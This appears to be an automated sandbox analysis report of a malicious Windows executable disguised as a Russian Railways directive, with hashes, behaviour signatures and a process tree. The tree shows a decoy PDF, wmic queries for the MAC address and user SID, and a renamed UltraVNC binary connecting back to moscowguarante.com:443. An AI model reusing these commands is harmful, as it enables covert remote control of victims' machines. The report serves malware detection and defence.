32df8c49d6f89722c6aca8943883cfff3cdf34074e87ff48f7c96da5d732c02b

Analysis

max time kernel
135s
max time network
138s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10/04/2024, 10:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

РАСПОРЯЖЕНИЕ_ГЛАВНОГО_УПРАВЛЕНИЯ-РЖД.exe
Size

1.5MB
MD5

754bfba24b12db4bcbb9c241baaa2557
SHA1

439ccde358d0a93da24cd2049d0a48d760732bca
SHA256

a9799ed289b967be92f920616015e58ae6e27defaa48f377d3cd701d0915fe53
SHA512

b5860b0ff23de57415b6b40d5852ee8f1cbd94cf0e0fcdd774cc9952052e172ccc75768a49ba4d93059e9904a3e5edacdf698036e3b2bb4f5ceb5d1c895455ea
SSDEEP

24576:WKWseKuCdU9rkNPfgkGP5B8ZbiELKLVj6iDyHBzZKpiE3XxoW2X0Fk3l1pm:TFzDW9rIfHGhSZbiELAVjvyxZmiE3Oi5

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1684	explorerr.exe
676	explorerr.exe

Loads dropped DLL 1 IoCs

pid	Process
848	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
680	timeout.exe
952	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1624	taskkill.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2676	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2640	WMIC.exe
Token: SeSecurityPrivilege	2640	WMIC.exe
Token: SeTakeOwnershipPrivilege	2640	WMIC.exe
Token: SeLoadDriverPrivilege	2640	WMIC.exe
Token: SeSystemProfilePrivilege	2640	WMIC.exe
Token: SeSystemtimePrivilege	2640	WMIC.exe
Token: SeProfSingleProcessPrivilege	2640	WMIC.exe
Token: SeIncBasePriorityPrivilege	2640	WMIC.exe
Token: SeCreatePagefilePrivilege	2640	WMIC.exe
Token: SeBackupPrivilege	2640	WMIC.exe
Token: SeRestorePrivilege	2640	WMIC.exe
Token: SeShutdownPrivilege	2640	WMIC.exe
Token: SeDebugPrivilege	2640	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2640	WMIC.exe
Token: SeRemoteShutdownPrivilege	2640	WMIC.exe
Token: SeUndockPrivilege	2640	WMIC.exe
Token: SeManageVolumePrivilege	2640	WMIC.exe
Token: 33	2640	WMIC.exe
Token: 34	2640	WMIC.exe
Token: 35	2640	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2640	WMIC.exe
Token: SeSecurityPrivilege	2640	WMIC.exe
Token: SeTakeOwnershipPrivilege	2640	WMIC.exe
Token: SeLoadDriverPrivilege	2640	WMIC.exe
Token: SeSystemProfilePrivilege	2640	WMIC.exe
Token: SeSystemtimePrivilege	2640	WMIC.exe
Token: SeProfSingleProcessPrivilege	2640	WMIC.exe
Token: SeIncBasePriorityPrivilege	2640	WMIC.exe
Token: SeCreatePagefilePrivilege	2640	WMIC.exe
Token: SeBackupPrivilege	2640	WMIC.exe
Token: SeRestorePrivilege	2640	WMIC.exe
Token: SeShutdownPrivilege	2640	WMIC.exe
Token: SeDebugPrivilege	2640	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2640	WMIC.exe
Token: SeRemoteShutdownPrivilege	2640	WMIC.exe
Token: SeUndockPrivilege	2640	WMIC.exe
Token: SeManageVolumePrivilege	2640	WMIC.exe
Token: 33	2640	WMIC.exe
Token: 34	2640	WMIC.exe
Token: 35	2640	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2728	WMIC.exe
Token: SeSecurityPrivilege	2728	WMIC.exe
Token: SeTakeOwnershipPrivilege	2728	WMIC.exe
Token: SeLoadDriverPrivilege	2728	WMIC.exe
Token: SeSystemProfilePrivilege	2728	WMIC.exe
Token: SeSystemtimePrivilege	2728	WMIC.exe
Token: SeProfSingleProcessPrivilege	2728	WMIC.exe
Token: SeIncBasePriorityPrivilege	2728	WMIC.exe
Token: SeCreatePagefilePrivilege	2728	WMIC.exe
Token: SeBackupPrivilege	2728	WMIC.exe
Token: SeRestorePrivilege	2728	WMIC.exe
Token: SeShutdownPrivilege	2728	WMIC.exe
Token: SeDebugPrivilege	2728	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2728	WMIC.exe
Token: SeRemoteShutdownPrivilege	2728	WMIC.exe
Token: SeUndockPrivilege	2728	WMIC.exe
Token: SeManageVolumePrivilege	2728	WMIC.exe
Token: 33	2728	WMIC.exe
Token: 34	2728	WMIC.exe
Token: 35	2728	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2728	WMIC.exe
Token: SeSecurityPrivilege	2728	WMIC.exe
Token: SeTakeOwnershipPrivilege	2728	WMIC.exe
Token: SeLoadDriverPrivilege	2728	WMIC.exe

Suspicious use of FindShellTrayWindow 40 IoCs

pid	Process
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe

Suspicious use of SendNotifyMessage 39 IoCs

pid	Process
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe
1684	explorerr.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2676	AcroRd32.exe
2676	AcroRd32.exe
2676	AcroRd32.exe

Suspicious use of WriteProcessMemory 52 IoCs

description	pid	Process	procid_target
PID 2884 wrote to memory of 848	2884	РАСПОРЯЖЕНИЕ_ГЛАВНОГО_УПРАВЛЕНИЯ-РЖД.exe	28
PID 2884 wrote to memory of 848	2884	РАСПОРЯЖЕНИЕ_ГЛАВНОГО_УПРАВЛЕНИЯ-РЖД.exe	28
PID 2884 wrote to memory of 848	2884	РАСПОРЯЖЕНИЕ_ГЛАВНОГО_УПРАВЛЕНИЯ-РЖД.exe	28
PID 2884 wrote to memory of 848	2884	РАСПОРЯЖЕНИЕ_ГЛАВНОГО_УПРАВЛЕНИЯ-РЖД.exe	28
PID 848 wrote to memory of 2676	848	cmd.exe	30
PID 848 wrote to memory of 2676	848	cmd.exe	30
PID 848 wrote to memory of 2676	848	cmd.exe	30
PID 848 wrote to memory of 2676	848	cmd.exe	30
PID 848 wrote to memory of 1628	848	cmd.exe	31
PID 848 wrote to memory of 1628	848	cmd.exe	31
PID 848 wrote to memory of 1628	848	cmd.exe	31
PID 848 wrote to memory of 1628	848	cmd.exe	31
PID 1628 wrote to memory of 2640	1628	cmd.exe	32
PID 1628 wrote to memory of 2640	1628	cmd.exe	32
PID 1628 wrote to memory of 2640	1628	cmd.exe	32
PID 1628 wrote to memory of 2640	1628	cmd.exe	32
PID 1628 wrote to memory of 2560	1628	cmd.exe	33
PID 1628 wrote to memory of 2560	1628	cmd.exe	33
PID 1628 wrote to memory of 2560	1628	cmd.exe	33
PID 1628 wrote to memory of 2560	1628	cmd.exe	33
PID 848 wrote to memory of 2768	848	cmd.exe	35
PID 848 wrote to memory of 2768	848	cmd.exe	35
PID 848 wrote to memory of 2768	848	cmd.exe	35
PID 848 wrote to memory of 2768	848	cmd.exe	35
PID 2768 wrote to memory of 2728	2768	cmd.exe	36
PID 2768 wrote to memory of 2728	2768	cmd.exe	36
PID 2768 wrote to memory of 2728	2768	cmd.exe	36
PID 2768 wrote to memory of 2728	2768	cmd.exe	36
PID 2768 wrote to memory of 2740	2768	cmd.exe	37
PID 2768 wrote to memory of 2740	2768	cmd.exe	37
PID 2768 wrote to memory of 2740	2768	cmd.exe	37
PID 2768 wrote to memory of 2740	2768	cmd.exe	37
PID 848 wrote to memory of 1624	848	cmd.exe	38
PID 848 wrote to memory of 1624	848	cmd.exe	38
PID 848 wrote to memory of 1624	848	cmd.exe	38
PID 848 wrote to memory of 1624	848	cmd.exe	38
PID 848 wrote to memory of 1684	848	cmd.exe	39
PID 848 wrote to memory of 1684	848	cmd.exe	39
PID 848 wrote to memory of 1684	848	cmd.exe	39
PID 848 wrote to memory of 1684	848	cmd.exe	39
PID 848 wrote to memory of 680	848	cmd.exe	40
PID 848 wrote to memory of 680	848	cmd.exe	40
PID 848 wrote to memory of 680	848	cmd.exe	40
PID 848 wrote to memory of 680	848	cmd.exe	40
PID 848 wrote to memory of 676	848	cmd.exe	41
PID 848 wrote to memory of 676	848	cmd.exe	41
PID 848 wrote to memory of 676	848	cmd.exe	41
PID 848 wrote to memory of 676	848	cmd.exe	41
PID 848 wrote to memory of 952	848	cmd.exe	42
PID 848 wrote to memory of 952	848	cmd.exe	42
PID 848 wrote to memory of 952	848	cmd.exe	42
PID 848 wrote to memory of 952	848	cmd.exe	42

C:\Users\Admin\AppData\Local\Temp\РАСПОРЯЖЕНИЕ_ГЛАВНОГО_УПРАВЛЕНИЯ-РЖД.exe
"C:\Users\Admin\AppData\Local\Temp\РАСПОРЯЖЕНИЕ_ГЛАВНОГО_УПРАВЛЕНИЯ-РЖД.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Roaming\Officee\60903.cmd" "
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:848
- - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\RZ.pdf"
    3⤵
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:2676
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic nic get MACAddress |find ":"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1628
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic nic get MACAddress
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2640
  - - C:\Windows\SysWOW64\find.exe
      find ":"
      4⤵
      PID:2560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic useraccount where name='Admin' get sid | find "S-1"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2768
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic useraccount where name='Admin' get sid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2728
  - - C:\Windows\SysWOW64\find.exe
      find "S-1"
      4⤵
      PID:2740
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im explorerr.exe
    3⤵
    - Kills process with taskkill
    PID:1624
- - C:\Users\Admin\AppData\Roaming\Officee\explorerr.exe
    "C:\Users\Admin\AppData\Roaming\Officee\explorerr.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1684
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 3
    3⤵
    - Delays execution with timeout.exe
    PID:680
- - C:\Users\Admin\AppData\Roaming\Officee\explorerr.exe
    "C:\Users\Admin\AppData\Roaming\Officee\explorerr.exe" -autoreconnect -id:56:D5:7A:93:5C:49_HSNHLVYA_S-1-5-21-3787592910-3720486031-2929222812-1000 -connect moscowguarante.com:443
    3⤵
    - Executes dropped EXE
    PID:676
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 5
    3⤵
    - Delays execution with timeout.exe
    PID:952

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
0616bf37b9f6405d8e2e8f177fa7aeb2

SHA1
bfc2fefd033b7098bdd4f5ceae558f21ab43edad

SHA256
9eefcd31ee62db76dc7bf8280ea75c34f3ecb171fc107fb27812c1332f95c94a

SHA512
2df3402ca0513d2dbbc41426603e0fcdf44e2a466dcd898fd17fed74b70a1c25f08be018645c2e1c5220cd8e8fa8a3c35aa3f4149a55906bf517936f27ce5c60

Download Submit
C:\Users\Admin\AppData\Roaming\Officee\60903.cmd

Filesize
858B

MD5
db70dfbca2cc8234a2d2dc0a5f00a68e

SHA1
cbc5640514e8b921be486b312abbed871ea2b884

SHA256
b6ff96193514aa11b6fc0e5d58e7dcdccedfa373ee4858a2da582e4eceae86c5

SHA512
813c01439064ee49ac413eb03bb433c31b6613d857c8c6c3f47651dd3747be39ef7502414601a35c76aa2f1222cafe5c8f42969610d3e50c34a3a4050fb32301

Download Submit
C:\Users\Admin\AppData\Roaming\Officee\MSRC4Plugin_for_sc.dsm

Filesize
66KB

MD5
54c6f440dce326a8f7f628d2bd0e757c

SHA1
6a28a3821b272c38f9a53b9d6b32395d9008c8f4

SHA256
d8a01f69840c07ace6ae33e2f76e832c22d4513c07e252b6730b6de51c2e4385

SHA512
78064b86076f79d9aa11f2ae0c8060e91643940182bc5241d226549eb798b0185709eb8e71d66a2b12542a7de65be4cb2493214873995dd1594582f04a689574

Download Submit
C:\Users\Admin\AppData\Roaming\Officee\RZ.pdf

Filesize
580KB

MD5
f66a9eb048fbc320dcc1bcb3c18320af

SHA1
8e8aaaa1aa318aee0c1cf4a7a8c1c87af1a132bf

SHA256
67b335a7abd286663aa28de60ac5e5417d99643e64c7d33e03ccea6ae826a334

SHA512
0cdd33b24eccd76c9ce906f51ba56c543d5e466d95ba01e921275812d488f788dc92d271f5d0d396385f46d71232fd3f80057f8c9141a5a6159ebbceea961b72

Download Submit
C:\Users\Admin\AppData\Roaming\Officee\UltraVNC.ini

Filesize
857B

MD5
a8b7229b55f865ec0c59ff0dcfe59e09

SHA1
8f0017b70fae57c72306d2cca88145762a9c91f1

SHA256
1e7728efa610aeeee579c5ba26abd438a6002690e593902af9c0d53ea36debf0

SHA512
c54550a477cf11ead92f93b48b3a77d75278e6f0212a89da794389802f6ae2cd08db56d3a1552251d439c45ea089642c8a601f132dbb836f6510a23212d5c287

Download Submit
C:\Users\Admin\AppData\Roaming\Officee\eldNdudDdNdadTdp.jpg

Filesize
62KB

MD5
0f06dc37619bd42fbb3d9646a2e94a1c

SHA1
60c9307ae050627d7ea3d21e46753fb43ddde230

SHA256
cbf6ae24da87b003b589ca5c1738f817b528c3c143154eeda8d02bdfc8291b1a

SHA512
6145c28cc072b7064cc352fff57d89efc244851128cd0df91399f26f9a0c05bde8d25b51e399e88aadb15b07a91e56333861088eadf7281c6a1c4a9e66f36773

Download Submit
C:\Users\Admin\AppData\Roaming\Officee\heKlKJK6K9KMKhK0.ini

Filesize
2.0MB

MD5
357743a202d5feb44f5de80d108e966e

SHA1
33732d4e77d852cfe3a763bb334c2944a81b2528

SHA256
91d6a11db693ca6975fa3d14a50a8868a30e97b99b52183af82c492c15e724e9

SHA512
f71dd208c93bd661db8fb8fcb93d3c2937276970f909ab6ede574ad3bbaeec8e67c309de5fde737b05dee9bc321826de4619b77ecdb41dd65f05f23891eaef90

Download Submit
C:\Users\Admin\AppData\Roaming\Officee\isr9rfrXrWr1r8rU.jpg

Filesize
142KB

MD5
ea646e527a3752a278e361e21874b033

SHA1
d888140c17d540281bfca934b1e1967f23318d60

SHA256
1fc977f7e2ed8103004a748c091c94c21a16a8b8df04160778375927ea5604db

SHA512
7de1098bf3d2dafdd0fe70edacc36ef36c5f4ba34bca63cc0eea2b3001ed4477a0802947eea507316eb8852bdc94dfb1e0c30005dc90ec456a5cb141fd78c3f4

Download Submit
C:\Users\Admin\AppData\Roaming\Officee\rc4.key

Filesize
87B

MD5
3a3bbdf24fb500bbd12dfe94ba84a007

SHA1
87f480995a2e1269878910c7697d602fc306625b

SHA256
3225058afbdf79b87d39a3be884291d7ba4ed6ec93d1c2010399e11962106d5b

SHA512
e6307dd02d104248c2d54132a6a509eb09d2e1bc722a57127d350dde8171a715b0a123ad28c8c44aa466e9e71e49fbcb8a13160ae2b58c3dba511968afae1c21

Download Submit
C:\Users\Admin\AppData\Roaming\Officee\xmzXzvzuz7zbzlzc.jpg

Filesize
147KB

MD5
07c7bdea1b6e350dd577cd86e10de495

SHA1
108e74f73bbe097ab24101f74d7d41123de672ae

SHA256
1f1c3450754eae8bfb94f37268fce7a9584d07a30052d4c528a509dfc84eda22

SHA512
dfc036e3b20ed9cc2df5b4ace5238473a305ce0ae9f930b35a4267da8eb221c969ed29e545b7c51464322d141a08771e2b6161a0462a65057d2fc77bfb8d96cd

Download Submit